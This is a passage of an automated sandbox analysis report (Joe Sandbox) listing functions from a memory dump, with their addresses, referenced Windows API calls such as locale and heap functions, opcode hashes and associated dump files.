Opcode Fuzzy Hash: 47b944eeafb250c54d068d10f20b40a869fc240e3044a791ad7e753f5ce3764d
Instruction Fuzzy Hash: 3A11A2A7B186458AFB158F25D4406BC77B1EB94BE0F448136D629833D0DE38E5E1CB40

Function 00007FF6D9C484DC Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,?,?,00007FF6D9C48276), ref: 00007FF6D9C4851B

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 276034861a9164e40ad21649232bf9a377c8788dc4334ff7c31fa38f3679a971
Instruction ID: 7ee20b98af1eaea7f4eda97fdbd73c7c66f66ba9659c1a10afdb4e875570f6ed
Opcode Fuzzy Hash: 276034861a9164e40ad21649232bf9a377c8788dc4334ff7c31fa38f3679a971
Instruction Fuzzy Hash: EA11A222B1865686E774AF66904017D72B1EB48BA4F948137DB5D833C4DE38F4A19B00

Function 00007FF6D9C47FE8 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(?,?,?,00007FF6D9C486E0,00000000,00000092,?,?,00000000,?,?,00007FF6D9C3D493), ref: 00007FF6D9C48066

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 39dc7ac0f12912b948c2acf28637d46675b9d8229f2a11fe64d436b3012b3495
Instruction ID: 72f384cc6a5f5abd19c8a856145f0828744e0c8ed8bf9193fd4fadd1500fc608
Opcode Fuzzy Hash: 39dc7ac0f12912b948c2acf28637d46675b9d8229f2a11fe64d436b3012b3495
Instruction Fuzzy Hash: C101D872F1824186E7205F15E4407BD76F1EB44BE4F858233D629872D5CF7DA4A0CB00

Function 00007FF6D9C275BC Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32 ref: 00007FF6D9C275E2

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 69ca287d5164a35a68b98fbd24b1908fccca41dda8a4977f78ac53e608727651
Instruction ID: d8ac08423a5f2fe4f5ad731606b332031056278af074b895377b6a1c35ec26bd
Opcode Fuzzy Hash: 69ca287d5164a35a68b98fbd24b1908fccca41dda8a4977f78ac53e608727651
Instruction Fuzzy Hash: 7CF03A62F2D04282E6B95E1D809D77C32B0BB44380F542937E10BC3694CE6CE5608741

Function 00007FF6D9C40EE4 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF6D9C4132C,?,?,?,?,?,?,?,?,00000000,00007FF6D9C4753C), ref: 00007FF6D9C40F1A

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: fe6d5dccc86e6788a8ab950fd3b15e63935f77aaf88324344d2b932bbdaae442
Instruction ID: f58f5433f02aff0df96f34def3e1e90a50865d55b9e980f27658e515dfdbf142
Opcode Fuzzy Hash: fe6d5dccc86e6788a8ab950fd3b15e63935f77aaf88324344d2b932bbdaae442
Instruction Fuzzy Hash: 18F0B232B18A4582E6009F26E89077D73B5EB99BC0F548036D65987765CE2CD4B0C740

Function 00007FF6D9C3EE38 Relevance: 1.5, Strings: 1, Instructions: 253COMMON

Download Yara Rule

Strings

gfffffff, xrefs: 00007FF6D9C3F176

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID:
String ID: gfffffff
API String ID: 0-1523873471
Opcode ID: bcc98a79a9fba4e5ba45007b45d9affdbf7001df6ef1ef910aab9cb3b0d765c0
Instruction ID: bce112f8ed7d4e6d8eb30f21a1632f906c7452562e4475d78760d08f3f8d43fc
Opcode Fuzzy Hash: bcc98a79a9fba4e5ba45007b45d9affdbf7001df6ef1ef910aab9cb3b0d765c0
Instruction Fuzzy Hash: 4DA12162B1878686EB21CF3AA4107AE7BB1AB54BC4F048132DE8D87795DE3DE512C701

Function 00007FF6D9C43790 Relevance: 1.4, APIs: 1, Instructions: 137COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6D9C43835

Part of subcall function 00007FF6D9C40E30: HeapAlloc.KERNEL32(?,?,00000000,00007FF6D9C3EA4F), ref: 00007FF6D9C40E85

Part of subcall function 00007FF6D9C3E5C0: HeapFree.KERNEL32(?,?,?,00007FF6D9C46936,?,?,?,00007FF6D9C46CB3,?,?,00000000,00007FF6D9C47239,?,?,?,00007FF6D9C4716B), ref: 00007FF6D9C3E5D6
Part of subcall function 00007FF6D9C3E5C0: GetLastError.KERNEL32(?,?,?,00007FF6D9C46936,?,?,?,00007FF6D9C46CB3,?,?,00000000,00007FF6D9C47239,?,?,?,00007FF6D9C4716B), ref: 00007FF6D9C3E5E0

Part of subcall function 00007FF6D9C4A690: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D9C4A6C3

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: ErrorHeapLast$AllocFree_invalid_parameter_noinfo
String ID:
API String ID: 916656526-0
Opcode ID: 19b0fd171d736a255338e524c416d1d230ff308197f25ddfe13bf518aa09b7ea
Instruction ID: ea7a49d25c49f706c198eba76c083a17bcd09e83e59469c6ea6a8681ffc69942
Opcode Fuzzy Hash: 19b0fd171d736a255338e524c416d1d230ff308197f25ddfe13bf518aa09b7ea
Instruction Fuzzy Hash: 7C41A521B0968742FA709E2669517BEA6B07FD9BC0F445537DE8DC7B85EE3CF4218A00

Function 00007FF6D9BF21E0 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF6D9C27E4C: AcquireSRWLockExclusive.KERNEL32(?,?,00000004,00007FF6D9BF2267,?,?,?,00007FF6D9BF37E1), ref: 00007FF6D9C27E5C

GetProcessHeap.KERNEL32(?,?,?,00007FF6D9BF37E1), ref: 00007FF6D9BF2216

Part of subcall function 00007FF6D9C27DE0: AcquireSRWLockExclusive.KERNEL32(?,?,00000004,00007FF6D9BF22CC,?,?,?,00007FF6D9BF37E1), ref: 00007FF6D9C27DF0
Part of subcall function 00007FF6D9C27DE0: ReleaseSRWLockExclusive.KERNEL32(?,?,00000004,00007FF6D9BF22CC,?,?,?,00007FF6D9BF37E1), ref: 00007FF6D9C27E30

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: ExclusiveLock$Acquire$HeapProcessRelease
String ID:
API String ID: 3865638231-0
Opcode ID: 61f53ec1994c4fdb8881b8707cf0538e69b1abd78c7f7c29306060b4ecc32df1
Instruction ID: e0e8a4b9614e7a96fe447917fd5e77a305052c85e1debfb8f6b9a4ddb700f2b7
Opcode Fuzzy Hash: 61f53ec1994c4fdb8881b8707cf0538e69b1abd78c7f7c29306060b4ecc32df1
Instruction Fuzzy Hash: EB21B261B0AA0795FA50DF24EC852BD36B4AF44394FA06177C51CC22B1DF3CA9B5CB90

Function 00007FF6D9C25160 Relevance: .7, Instructions: 727COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID:
API String ID: 593203224-0
Opcode ID: 9e8b796dbb6a1d9e81a6458b066a37f6f863064e388ab306fec1ae10bb522697
Instruction ID: cdc8326ee8fc1e9d65781b8586c8cae82f33f79d86daef76af242250d918db28
Opcode Fuzzy Hash: 9e8b796dbb6a1d9e81a6458b066a37f6f863064e388ab306fec1ae10bb522697
Instruction Fuzzy Hash: 7C725772A08A8585EB648F6AC49037E77B1FB44BD8F54A132DA5E877A1DF3DE461C300

Function 00007FF6D9C392C4 Relevance: .5, Instructions: 506COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: _invalid_parameter_noinfo$AllocHeap
String ID:
API String ID: 443252259-0
Opcode ID: fda9ed7ec09c402308548bee876b6f52b5aaf7f4d1c35ce60392bf0a69c1a8d9
Instruction ID: beff351c3ed7787693ba08e86959e028a1a65d32306396c4b7161ede8195041f
Opcode Fuzzy Hash: fda9ed7ec09c402308548bee876b6f52b5aaf7f4d1c35ce60392bf0a69c1a8d9
Instruction Fuzzy Hash: 2312B261B18A4A86EE60DF3998081FD6371FB55BE0F545332CA6E873D0EE39E466C301

Function 00007FF6D9C241C8 Relevance: .5, Instructions: 494COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID:
API String ID: 593203224-0
Opcode ID: 3a3f53e26725aee8d9f9124111f58d9d846b1aa7fd0e075e141c3c6f2682eb13
Instruction ID: ffb2b96a924967738a676f3eb18b45ef509bac1552d59e6e577f0ab9a5d5f254
Opcode Fuzzy Hash: 3a3f53e26725aee8d9f9124111f58d9d846b1aa7fd0e075e141c3c6f2682eb13
Instruction Fuzzy Hash: 3722A022B0CA8586EB208F26D4442BDB7B1FB99BC8F455132DE8D97B55EE3CE495C700

Function 00007FF6D9C180E8 Relevance: .5, Instructions: 491COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: LockitLockit::_std::_
String ID:
API String ID: 3382485803-0
Opcode ID: dfba43b60f2aa14815d3e6ec4e9cfb66ede2106a05633d32278d8cbd7d641432
Instruction ID: 2cc0c1a308bd79bd541b8408fcedbdbc48d033bb2cddbd1b151d1d56b1c369ee
Opcode Fuzzy Hash: dfba43b60f2aa14815d3e6ec4e9cfb66ede2106a05633d32278d8cbd7d641432
Instruction Fuzzy Hash: 2D228D22A0CA8586EB64CF25C4501BD6770FB99BC8F844133EA4DA3BA5EF3CD5A5C344

Function 00007FF6D9C1881C Relevance: .5, Instructions: 491COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_
String ID:
API String ID: 593203224-0
Opcode ID: bbd34a78ec0c66727cb7ea32f46b40ec62c96aff321a2ec60c918f94de3a82dd
Instruction ID: 3971b9a5029e41370b922858910cf30a34465a8c2b72ffd1c526a30f662869a2
Opcode Fuzzy Hash: bbd34a78ec0c66727cb7ea32f46b40ec62c96aff321a2ec60c918f94de3a82dd
Instruction Fuzzy Hash: AF228C62A1CA8686EB648F25C4501BD7771FB95BC8F404133EA4DA3BA4EF3CE5A5C340

Function 00007FF6D9C31858 Relevance: .4, Instructions: 421COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2f988bff49f3a4abbbf32aacabf4a3712aacff4782916a646cfe534fbd0950b
Instruction ID: 9d93b5adade954d31e97ff67f0a94a9091eb46b43b9d76d8a6057eee05eea5df
Opcode Fuzzy Hash: c2f988bff49f3a4abbbf32aacabf4a3712aacff4782916a646cfe534fbd0950b
Instruction Fuzzy Hash: F2028B72A187468EEB648F39D48017C37B1FB46BD8B245637CA1D87698DF39E962C340

Function 00007FF6D9C3D2D4 Relevance: .3, Instructions: 311COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: NameTranslate$CodePageValid_invalid_parameter_noinfo
String ID:
API String ID: 4003095782-0
Opcode ID: c21c31f2fc2676bda15469c0d822a7cb30643392ec22c1bd56d11ecf36906c54
Instruction ID: c6e60b030b58add3e79880364026018449095bea56be1ba89be60e5ec61514c5
Opcode Fuzzy Hash: c21c31f2fc2676bda15469c0d822a7cb30643392ec22c1bd56d11ecf36906c54
Instruction Fuzzy Hash: EAC1A266B0868285EB609F7198107BE27B4FB957C8F408233DE8DC7695EE3DE565C700

Function 00007FF6D9C33BF4 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6574901448fe34b7f0063453580bb2776d5691e1a68a0989abf8afa9a92b9c6f
Instruction ID: 47f183ca31c52e080bd9faae65a99b59e89a335be8733412fda874f5c6423c31
Opcode Fuzzy Hash: 6574901448fe34b7f0063453580bb2776d5691e1a68a0989abf8afa9a92b9c6f
Instruction Fuzzy Hash: 7BA14626B2864646FF649F39A4103BE26B0AF447D8F84063ADD1ECB7E4DE3CE4159B04

Function 00007FF6D9C47600 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 066fa6dc129c8db66a9903168c5049cfb0b6bcabbabeaf70dbf2bf925b3ad596
Instruction ID: dd32112b82499aa507d86b9dfe5a4e5ef499cb2957852e799bf45335c76f3702
Opcode Fuzzy Hash: 066fa6dc129c8db66a9903168c5049cfb0b6bcabbabeaf70dbf2bf925b3ad596
Instruction Fuzzy Hash: D4B19F32B0868686EB649F21D5116BD33B5FB58BC8F444232DA1DD7689DF3CE561CB80

Function 00007FF6D9C0AB4C Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b369e4d611f2271c025e8e30fe8b4fc1618eb6d88e416f33be8816871b34b968
Instruction ID: 387e17e3799ddbaa3af45a299617bd5ce7887a351bab39d56bc31f9cd03ae6d6
Opcode Fuzzy Hash: b369e4d611f2271c025e8e30fe8b4fc1618eb6d88e416f33be8816871b34b968
Instruction Fuzzy Hash: EB91AFA2B19BA586FB508F66C45427C37B1AB45BC8F558032DE0E87B94EF39D8A1C300

Function 00007FF6D9C035E0 Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88e455fc7aa2f2adea69b99f321d66fecc83aba96c81983c2a0c0dd5cfcf6da5
Instruction ID: fb3892aec106432baba4798b6a75cd26e569935bbfcc69733ef432c69befb80c
Opcode Fuzzy Hash: 88e455fc7aa2f2adea69b99f321d66fecc83aba96c81983c2a0c0dd5cfcf6da5
Instruction Fuzzy Hash: 1091E3A6A09A9189FB25CF7AC4602BC2BB1BB45BC8F244137CE4E97395DE39D465C300

Function 00007FF6D9C42410 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1447928637.00007FF6D9BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6D9BF0000, based on PE: true

Associated: 0000000C.00000002.1447903010.00007FF6D9BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1447979243.00007FF6D9C52000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448006981.00007FF6D9C6C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C71000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000C.00000002.1448030058.00007FF6D9C77000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ff6d9bf0000_MSIC534.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c33a6b7ba7b80a4c5a3a224c0fb15113dbbc5669709bd21f1056c5f9813a480a
Instruction ID: 09debdc3abf675694f5b5e42a706ea46240f78492a524c0faa05562caf7aa9e4
Opcode Fuzzy Hash: c33a6b7ba7b80a4c5a3a224c0fb15113dbbc5669709bd21f1056c5f9813a480a
